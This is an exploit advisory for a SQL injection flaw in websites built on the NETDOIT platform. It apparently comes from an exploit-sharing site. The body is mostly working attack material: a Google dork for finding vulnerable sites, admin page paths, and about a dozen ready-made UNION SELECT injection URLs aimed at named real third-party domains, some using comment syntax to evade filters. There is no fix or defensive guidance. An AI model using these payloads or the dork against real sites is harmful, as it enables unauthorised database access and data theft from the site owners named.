NETDOIT SQL injection Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>NETDOIT SQL injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : Power by NETDOIT SQL injection Vulnerability # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://web.net-doit.com/ # Google Dork : intext:"Power by NETDOIT" news_detail.php?id= # Date: 2016 22 October # Tested On : Win 10 / Google Chrome / Mozilla Firefox # ###################### # admin page : target/a/ or /m/ # demos : # http://www.dcbox.com.tw/mobile/news_detail.html?id=-107+union+select+version(),2,3 # http://iweb11.ieshop.tw/mobile/news_detail.html?id=-82+union+select+version(),2,3 # http://www.ieshop.tw/mobile/news_detail.html?id=-81+union+select+version(),2,3 # http://www.29648834.com/news_detail.php?id=-84+/*!50000union*/+select+version(),2 # http://www.haoda.com.tw/news_detail.php?id=-75+/*!50000union*/+select+version(),2 # http://iweb49.ieshop.tw/news_detail.html?id=-81+union+select+1,version(),3,4,5,6,7,8,9,10,11--%20- # http://www.jiayin.com.tw/news_detail.php?id=-73+/*!50000union*/+select+version(),2 # http://www.mingjiann.com.tw/news_detail.php?id=-68+/*!50000union*/+select+1,version(),3,4,5,6,7,8,9,10,11,12,13 # http://www.bon-tech.com.tw/news_detail.php?id=-84+/*!50000union*/+select+version(),2 # http://www.s2r.com.tw/news_detail.php?id=-14+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--%20- # http://www.master-new.com.tw/news_detail.php?id=-73+/*!50000union*/+select+version(),2 # http://www.jialung.com.tw/en/news_detail.php?id=-12+/*!50000union*/+select+version(),2 ###################### # discovered by : modiret ######################</BODY></HTML>